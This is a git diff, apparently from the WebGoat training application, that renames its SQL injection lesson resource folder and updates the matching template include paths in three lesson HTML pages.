diff --git a/src/main/resources/lessons/sql_injection/css/assignments.css b/src/main/resources/lessons/sqlinjection/css/assignments.css
similarity index 100%
rename from src/main/resources/lessons/sql_injection/css/assignments.css
rename to src/main/resources/lessons/sqlinjection/css/assignments.css
diff --git a/src/main/resources/lessons/sql_injection/css/challenge.css b/src/main/resources/lessons/sqlinjection/css/challenge.css
similarity index 100%
rename from src/main/resources/lessons/sql_injection/css/challenge.css
rename to src/main/resources/lessons/sqlinjection/css/challenge.css
diff --git a/src/main/resources/lessons/sql_injection/css/quiz.css b/src/main/resources/lessons/sqlinjection/css/quiz.css
similarity index 100%
rename from src/main/resources/lessons/sql_injection/css/quiz.css
rename to src/main/resources/lessons/sqlinjection/css/quiz.css
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_1__servers.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_1__servers.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_1__servers.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_1__servers.sql
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_2__users.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_2__users.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_2__users.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_2__users.sql
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_3__salaries.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_3__salaries.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_3__salaries.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_3__salaries.sql
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_4__tan.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_4__tan.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_4__tan.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_4__tan.sql
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_5__challenge_assignment.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_5__challenge_assignment.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_5__challenge_assignment.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_5__challenge_assignment.sql
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_6__user_system_data.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_6__user_system_data.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_6__user_system_data.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_6__user_system_data.sql
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_7__employees.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_7__employees.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2019_09_26_7__employees.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2019_09_26_7__employees.sql
diff --git a/src/main/resources/lessons/sql_injection/db/migration/V2021_03_13_8__grant.sql b/src/main/resources/lessons/sqlinjection/db/migration/V2021_03_13_8__grant.sql
similarity index 100%
rename from src/main/resources/lessons/sql_injection/db/migration/V2021_03_13_8__grant.sql
rename to src/main/resources/lessons/sqlinjection/db/migration/V2021_03_13_8__grant.sql
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjectionAdvanced_plan.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjectionAdvanced_plan.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjectionAdvanced_plan.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjectionAdvanced_plan.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_challenge.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_challenge.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_challenge.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_challenge.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content10.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content10.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content10.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content10.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content11.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content11.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content11.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content11.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content12.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content12.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12a.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content12a.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12a.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content12a.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12b.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content12b.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content12b.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content12b.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content13.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content13.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content13.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content13.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content14.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content14.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content14.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content14.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6a.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6a.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6a.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6a.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6c.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6c.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content6c.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content6c.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content7.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content7.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content7.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content7.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content8.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content8.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content8.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content8.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_content9.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content9.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_content9.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_content9.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content1.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content1.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content1.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content1.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content10.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content10.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content10.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content10.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content11.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content11.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content11.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content11.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content12.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content12.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content12.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content12.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content2.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content2.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content2.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content2.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content3.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content3.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content3.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content3.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content4.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content4.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content4.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content4.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_after.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content5_after.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_after.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content5_after.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_before.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content5_before.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content5_before.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content5_before.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content6.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content6.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content6.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content6.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content7.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content7.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content7.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content7.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content8.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content8.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content8.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content8.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content9.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content9.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_content9.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content9.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_plan.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_plan.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_introduction_plan.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_plan.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_completion.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_jdbc_completion.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_completion.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_jdbc_completion.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_newcode.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_jdbc_newcode.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_jdbc_newcode.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_jdbc_newcode.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_order_by.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_order_by.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_order_by.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_order_by.adoc
diff --git a/src/main/resources/lessons/sql_injection/documentation/SqlInjection_quiz.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_quiz.adoc
similarity index 100%
rename from src/main/resources/lessons/sql_injection/documentation/SqlInjection_quiz.adoc
rename to src/main/resources/lessons/sqlinjection/documentation/SqlInjection_quiz.adoc
diff --git a/src/main/resources/lessons/sql_injection/html/SqlInjection.html b/src/main/resources/lessons/sqlinjection/html/SqlInjection.html
similarity index 85%
rename from src/main/resources/lessons/sql_injection/html/SqlInjection.html
rename to src/main/resources/lessons/sqlinjection/html/SqlInjection.html
index fb2b169a2..529b54b56 100644
--- a/src/main/resources/lessons/sql_injection/html/SqlInjection.html
+++ b/src/main/resources/lessons/sqlinjection/html/SqlInjection.html
@@ -5,12 +5,12 @@
 
 <!--Page 1-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_plan.adoc"></div>
 </div>
 
 <!--Page 2-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content1.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content1.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -34,7 +34,7 @@
 
 <!--Page 3-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content2.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content2.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -58,7 +58,7 @@
 
 <!--Page 4-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content3.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content3.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -82,7 +82,7 @@
 
 <!--Page 5-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content4.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content4.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -106,7 +106,7 @@
 
 <!--Page 6-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content5_before.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content5_before.adoc"></div>
     <div>
         <label for="username-preview">Username:</label>
         <input id="preview-input" type="text" name="username" val=""/>
@@ -123,22 +123,22 @@
             });
         </script>
     </div>
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content5_after.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content5_after.adoc"></div>
 </div>
 
 <!--Page 7-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content6.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content6.adoc"></div>
 </div>
 
 <!--Page 8-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content7.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content7.adoc"></div>
 </div>
 
 <!--Page 9-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content11.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content11.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -183,7 +183,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content12.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content12.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -211,7 +211,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content8.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content8.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -239,7 +239,7 @@
 
 <!--Page 10-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content9.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content9.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -267,7 +267,7 @@
 
 <!--Page 11-->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_introduction_content10.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_introduction_content10.adoc"></div>
 
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
diff --git a/src/main/resources/lessons/sql_injection/html/SqlInjectionAdvanced.html b/src/main/resources/lessons/sqlinjection/html/SqlInjectionAdvanced.html
similarity index 92%
rename from src/main/resources/lessons/sql_injection/html/SqlInjectionAdvanced.html
rename to src/main/resources/lessons/sqlinjection/html/SqlInjectionAdvanced.html
index b3c9e6bec..040c824d9 100644
--- a/src/main/resources/lessons/sql_injection/html/SqlInjectionAdvanced.html
+++ b/src/main/resources/lessons/sqlinjection/html/SqlInjectionAdvanced.html
@@ -5,17 +5,17 @@
 
 <!-- 1 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjectionAdvanced_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjectionAdvanced_plan.adoc"></div>
 </div>
 
 <!-- 2 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content6.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content6.adoc"></div>
 </div>
 
 <!-- 3 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content6a.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content6a.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -51,10 +51,10 @@
 
 <!-- 4 -->
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content6c.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content6c.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_challenge.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_challenge.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/challenge.css}"/>
     <script th:src="@{/lesson_js/challenge.js}" language="JavaScript"></script>
     <div class="attack-container">
@@ -162,7 +162,7 @@
     <link rel="stylesheet" type="text/css" th:href="@{/css/quiz.css}"/>
     <script th:src="@{/js/quiz.js}" language="JavaScript"></script>
     <link rel="import" type="application/json" th:href="@{/lesson_js/questions.json}"/>
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_quiz.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_quiz.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <div class="container-fluid">
diff --git a/src/main/resources/lessons/sql_injection/html/SqlInjectionMitigations.html b/src/main/resources/lessons/sqlinjection/html/SqlInjectionMitigations.html
similarity index 84%
rename from src/main/resources/lessons/sql_injection/html/SqlInjectionMitigations.html
rename to src/main/resources/lessons/sqlinjection/html/SqlInjectionMitigations.html
index 5a72e0a99..f989a1c05 100644
--- a/src/main/resources/lessons/sql_injection/html/SqlInjectionMitigations.html
+++ b/src/main/resources/lessons/sqlinjection/html/SqlInjectionMitigations.html
@@ -4,23 +4,23 @@
 <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/assignments.css}"/>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content7.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content7.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content8.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content8.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content9.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content9.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content10.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content10.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_jdbc_completion.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_jdbc_completion.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN" method="POST" name="form" action="/WebGoat/SqlInjectionMitigations/attack10a">
@@ -40,7 +40,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_jdbc_newcode.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_jdbc_newcode.adoc"></div>
     <div class="attack-container" style="border: none !important; height: 100%; min-height: 300px;">
         <form id="codesubmit" style="height: 100%; min-height: 300px;" class="attack-form" accept-charset="UNKNOWN" method="POST" name="form" action="/WebGoat/SqlInjectionMitigations/attack10b">
             <div>
@@ -60,14 +60,14 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content11.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content11.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content12.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content12.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content12a.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content12a.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -90,7 +90,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content12b.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content12b.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -114,11 +114,11 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content13.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content13.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_order_by.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_order_by.adoc"></div>
     <script th:src="@{/lesson_js/assignment13.js}" language="JavaScript"></script>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -191,7 +191,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content14.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sqlinjection/documentation/SqlInjection_content14.adoc"></div>
 </div>
 
 </html>
diff --git a/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels.properties b/src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/sql_injection/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_de.properties b/src/main/resources/lessons/sqlinjection/i18n/WebGoatLabels_de.properties
similarity index 100%
rename from src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_de.properties
